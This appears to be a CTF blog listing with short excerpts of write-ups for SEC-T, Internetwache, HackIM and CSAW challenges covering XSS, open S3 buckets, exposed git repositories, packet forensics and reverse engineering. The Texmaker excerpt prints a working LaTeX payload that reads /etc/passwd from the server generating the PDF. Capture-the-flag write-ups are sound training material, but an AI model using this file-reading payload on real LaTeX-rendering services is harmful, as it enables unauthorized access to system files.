SECT-T CTF Admin I & II — Web 100 & 200

I’ve been out of practice for CTFs as of late, but SEC-T just ran a short but fun CTF that had a number of quick problems which I thoroughly enjoyed. Here I will focus on Admin I & II, both XSS problems created by Mathias Karlsson.

Admin I — Web 100

Can you alert(1) this page (in firefox)?
Sure, I’ll take that challenge: the page asks if you can achieve an xss of alert(1) and gives you a link with the injectable parameter (http://xss1.sect.ctf.rocks/?xss=stuff). The resulting script on the page looks like this:
<script>
 dontrunthisscript();
 var a = “stuff”;
 </script>

No matter what you inject to replace “stuff”, you will find that the code will not run since it attempts to call dontrunthisscript()first, which isn’t defined. Additionally the “<” character was filtered out, so we couldn’t just make our own new <script> block :( .

The console is mad at us for trying to run it :(

SEC-T CTF — iFile — Web 250

This was the third challenge I attempted in the great ctf run by @SEC_T_org. It dealt with an issue I’d been interested in for a while: Overly permissive S3 buckets on Amazon AWS.
An issue seen in a number of S3/AWS configs is the “Any Authenticated AWS User” permission. It allows access not just to AWS users authenticated to your account but to any authenticated AWS users period.

Internetwache CTF 2016 — Misc80–404 Flag not found

This one was pretty quick, but lots of fun. The initial file is a packet capture showing a number attempted GETs and DNS queries. Looking at the subdomains I noticed that they seem to be made up of hex values.

Sexy Hexy Subdomains

Internetwache CTF 2016 — Web80–0ldsk00lBlog

Navigating to the challenge page shows a super plain, simple HTML Blog post. There was not much to work on, but one the blog posts happens to mention the owner’s use of git.

I suspect he doesn’t know how to use git well. I certainly don’t.

Internetwache CTF 2016 — Web90 — Texmaker

This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field which generates LaTex, which is then used to generate a PDF.
This paper discusses methods for exploiting LaTex, including some sample code which could be used for reading files from the server.
\openin5=/etc/passwd
\def\readfile{%
    \read5 to \curline
    \ifeof5 \let\next=\relax
    \else \curline~\\
        \let\next=\readfile
    \fi
    \next} %
\ifeof5 Couldn’t Read the File! %
\else \readfile \closein5
\fi

After generating and checking the PDF I got the following:
Sweet sweet local files

HackIM 2016 Forensics 200

This challenge was pretty fun, there were a couple of dead ends/tricks.
The first step was to take a look at the packets. You can quickly notice that a ton of files are being grabbed using Wget (seen in the user-agent below). These can be exported using Wireshark’s File -> Export Objects -> HTTP.

The request URI shows what to expect in the files you extract from the packets.

HackIM 2016 RE 100 - ZorroPub


So, I tried a couple of different things with this challenge before just finally just scripting/brute-forcing my way through it.
Initially, while looking at the problem in Bokken (A cool GUI for radare2, a nice free alternative to IDA pro) I found the addresses of all of the compares which would allow me to bypass any sort of check on the inputs. Setting breakpoints in GDB and appropriately setting the Zero Flag when the program is doing a comparison before a jump.

It didn't quite work :(

CSAW 2016 Reverse 100 -- Rock

When you first run rock you just get a blank prompt. Input a couple of characters and you get a couple of quotes from the talented Dwayne “The Rock” Johnson, and a message saying “Too short or too long” unless you guessed (or checked) the right length.

'derp' wasn't the flag :(